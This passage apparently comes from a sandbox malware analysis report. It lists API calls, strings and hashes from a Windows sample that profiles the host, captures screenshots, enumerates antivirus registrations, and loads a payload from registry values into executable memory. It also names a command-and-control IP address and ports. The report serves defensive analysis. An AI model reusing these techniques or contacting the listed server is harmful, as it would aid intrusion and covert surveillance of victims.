                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037758E9
                                                                                                                                                                      • __time64.LIBCMT ref: 037758F8
                                                                                                                                                                      • __localtime64.LIBCMT ref: 0377592F
                                                                                                                                                                      • wsprintfW.USER32 ref: 03775968
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0377597D
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0377598C
                                                                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 03775999
                                                                                                                                                                        • Part of subcall function 037780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03778132
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                        • Part of subcall function 037780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                        • Part of subcall function 037780F0: lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                        • Part of subcall function 037780F0: __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                                                                      • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 02BD04AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 02BD04DE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD04F5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03780542: __fassign.LIBCMT ref: 03780538
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0377DF64
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377DF91
                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0377DFA9
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377DFE0
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(037775B0), ref: 0377DFEE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377E007
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • EnumWindows.USER32(03775CC0,?), ref: 0377E19D
                                                                                                                                                                      • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0377E1AA
                                                                                                                                                                      • EnumWindows.USER32(03775CC0,?), ref: 0377E1BE
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0377E1F5
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0377E241
                                                                                                                                                                      • Sleep.KERNEL32(00000FA0), ref: 0377E2C4
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0377E2EB
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0377E30B
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E35D
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0377E3A4
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0377E3D0
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0377E3D7
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0377E3E2
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E400
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0377E425
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0377E42C
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 0377E446
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377E464
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0377BC8F
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0377BC9C
                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0377BCA2
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0377BCAD
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0377BCBA
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000076), ref: 0377BCC2
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0377BCD3
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0377BCF8
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0377BD26
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 0377BD78
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 0377BD8D
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0377BDA6
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0377BDB4
                                                                                                                                                                      • SetStretchBltMode.GDI32(?,00000003), ref: 0377BDC0
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0377BDCD
                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0377BDE0
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0377BE07
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BE7A
                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0377BE97
                                                                                                                                                                      • _memset.LIBCMT ref: 0377BEAF
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BF23
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BF2D
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0377BF39
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BFDF
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0377BFE9
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0377BFF5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                                                                      • String ID: ($6$gfff$gfff

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03776A94
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776AA7
                                                                                                                                                                        • Part of subcall function 03776910: GetCurrentProcessId.KERNEL32(A0516FA3,00000000,00000000,75BF73E0,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776938
                                                                                                                                                                        • Part of subcall function 03776910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776947
                                                                                                                                                                        • Part of subcall function 03776910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 03776960
                                                                                                                                                                        • Part of subcall function 03776910: CloseHandle.KERNEL32(00000000,?,00000000,037910DB,000000FF,?,03776AB3,00000000), ref: 0377696B
                                                                                                                                                                      • _memset.LIBCMT ref: 03776AC2
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 03776ADB
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 03776B12
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 03776B19
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03776B3F
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03776B49
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 03776B5D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03776B85
                                                                                                                                                                      • GetSidSubAuthorityCount.ADVAPI32 ref: 03776B98
                                                                                                                                                                      • GetSidSubAuthority.ADVAPI32(00000000), ref: 03776BA6
                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 03776BB5
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03776BC2
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776C1B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                                                                      • String ID: -N/$NO/$None/%s
                                                                                                                                                                      • API String ID: 3036438616-3095023699
                                                                                                                                                                      • Opcode ID: 4d29e2ec9422c828eee98cd2ceb5bc759bab9370e1fe7103e61637e5b945d1b4
                                                                                                                                                                      • Instruction ID: 703e4eb95ebd112c768aa09972a7601325295794eeb5f36b350b883565f5ac7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d29e2ec9422c828eee98cd2ceb5bc759bab9370e1fe7103e61637e5b945d1b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2941E5B0A0061CAFEF20EB64DC88FEE7778EB0E310F048596F60596149DA34D995CFA0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      [Figure: control-flow graph of the function at 3776150; legend: Executed / Not Executed]
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377618B
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379510C,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 037761CD
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379535C,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 037761D9
                                                                                                                                                                      • CoCreateInstance.OLE32(03792480,00000000,00000017,0379578C,?,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 03776220
                                                                                                                                                                      • _memset.LIBCMT ref: 037762CE
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776336
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0377635F
                                                                                                                                                                      • _memset.LIBCMT ref: 03776376
                                                                                                                                                                        • Part of subcall function 03776050: _memset.LIBCMT ref: 0377607C
                                                                                                                                                                        • Part of subcall function 03776050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03776088
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                      • API String ID: 1221949200-1583895642
                                                                                                                                                                      • Opcode ID: 2f0bcb90ad1e9310a18a10f10c5e3d0e78be4cdea297a9cf0d4550fad76cc038
                                                                                                                                                                      • Instruction ID: 3d77d207212e75f97fb422f9a3649dc002664e96b06e808581c6e0eeb7b2a1b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f0bcb90ad1e9310a18a10f10c5e3d0e78be4cdea297a9cf0d4550fad76cc038
                                                                                                                                                                      • Instruction Fuzzy Hash: F38192F1A40628AFDB20EB54CC44FAEB7B8EB48704F4446C9F719A7146D674AA41CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03778132
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03778228
                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03778233
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                      • API String ID: 950920757-1009255891
                                                                                                                                                                      • Opcode ID: 623f28c4906587f435313305346588dabe03913ce6ace84e658f71a8a5db95ee
                                                                                                                                                                      • Instruction ID: 47d436fca33e0db501ea430445fe5a68ea5ddf0def03a6882c3acea557dce79e
                                                                                                                                                                      • Opcode Fuzzy Hash: 623f28c4906587f435313305346588dabe03913ce6ace84e658f71a8a5db95ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 5541CA71A0121CEBDF20EF64DD85AEEB37CEF44710F04459ADA09A7141E774DA05CBA5
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03775320: InterlockedDecrement.KERNEL32(00000008), ref: 0377536F
                                                                                                                                                                        • Part of subcall function 03775320: SysFreeString.OLEAUT32(00000000), ref: 03775384
                                                                                                                                                                        • Part of subcall function 03775320: SysAllocString.OLEAUT32(03795148), ref: 037753D5
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03795148,037769A4,03795148,00000000,75BF73E0), ref: 037767F4
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 037767FE
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 03776816
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0377681D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0377683F
                                                                                                                                                                      • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03776871
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0377687B
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 037768E6
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 037768ED
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                                                                      • String ID: NONE_MAPPED
                                                                                                                                                                      • API String ID: 1317816589-2950899194
                                                                                                                                                                      • Opcode ID: f7c1479e3f578be32b0ba0ea10676f6b769f1e75ddafa9a518a9879168128c2a
                                                                                                                                                                      • Instruction ID: fef9d745039a28d6aa91d8b06c27eb1a97560e1ece2c9fc7bd517400655588bc
                                                                                                                                                                      • Opcode Fuzzy Hash: f7c1479e3f578be32b0ba0ea10676f6b769f1e75ddafa9a518a9879168128c2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 494195B5A0021CAFDF20EB64DD48FEEB37DEB89700F048599E709AB145DA745A85CF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03776C8B
                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03776CAA
                                                                                                                                                                      • _memset.LIBCMT ref: 03776CE1
                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 03776CF4
                                                                                                                                                                      • swprintf.LIBCMT ref: 03776D39
                                                                                                                                                                      • swprintf.LIBCMT ref: 03776D4C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                                                                      • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                                                                      • API String ID: 3202570353-3501811827
                                                                                                                                                                      • Opcode ID: c6effab86de71ea921d8d8cbdbc2641c1dedc1171280596d5e15f76824dce5bc
                                                                                                                                                                      • Instruction ID: aa0d7716b205ee06259663bd4b1d3d58d6f879e99156f1072c212308bbb91451
                                                                                                                                                                      • Opcode Fuzzy Hash: c6effab86de71ea921d8d8cbdbc2641c1dedc1171280596d5e15f76824dce5bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 943161B6E0021CABDB14DFE5DC45FEEB7B9FB48700F50821EE91AAB241D6746905CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDXGIFactory.DXGI(0379579C,?,A0516FA3,74DEDF80,00000000,75BF73E0), ref: 03776F4A
                                                                                                                                                                      • swprintf.LIBCMT ref: 0377711E
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037771C7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                                                                      • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                                                                      • API String ID: 3803070356-257307503
                                                                                                                                                                      • Opcode ID: 5c2837d3b6fca5ce85a06c641adef498103314b88886ca95fff5a68559796ace
                                                                                                                                                                      • Instruction ID: 56fbbd23d8c034159b1940972e58f070fe2b18037856014e6d7fbd69fb2835a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c2837d3b6fca5ce85a06c641adef498103314b88886ca95fff5a68559796ace
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E15471E012699FDF28CE64CC84BFEB375AB89700F1446E9D919A7284D770AE81CF91

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C65507
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C6552E
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65548
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C65563
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C65586
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 02C655B1
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C65605
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65669
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6568D
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6569F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C65726
                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C65799
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C657AC
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C657C4
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C657CE
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C657FE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                                                                      • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                                                                      • API String ID: 354323817-737951744
                                                                                                                                                                      • Opcode ID: f9ae37a25ab619e99da680d8d334c621e1c974439dd3f6ba3d9827bb995ae706
                                                                                                                                                                      • Instruction ID: 8ba52572b471c42d9dc5758117341aca01abcd55b53e4630e5460a15f3d95477
                                                                                                                                                                      • Opcode Fuzzy Hash: f9ae37a25ab619e99da680d8d334c621e1c974439dd3f6ba3d9827bb995ae706
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B91D4B5A40204AFEB20DF60DC88FBA77BEFB85740F508659FA099B240D7749A44CF91

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779E7B
                                                                                                                                                                      • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779EFC
                                                                                                                                                                      • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779F24
                                                                                                                                                                      • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03779F7F
                                                                                                                                                                      • _malloc.LIBCMT ref: 03779FC0
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 0377A000
                                                                                                                                                                      • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0377A028
                                                                                                                                                                      • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0377A0B7
                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0377A112
                                                                                                                                                                      • _free.LIBCMT ref: 0377A134
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0377A183
                                                                                                                                                                      • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0377A1D0
                                                                                                                                                                      • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03795A78,00022009,?,00000000,?,00000000), ref: 0377A22C
                                                                                                                                                                      • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0377A24C
                                                                                                                                                                      • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0377A267
                                                                                                                                                                      • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0377A274
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0377A27B
                                                                                                                                                                      • _free.LIBCMT ref: 0377A296
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
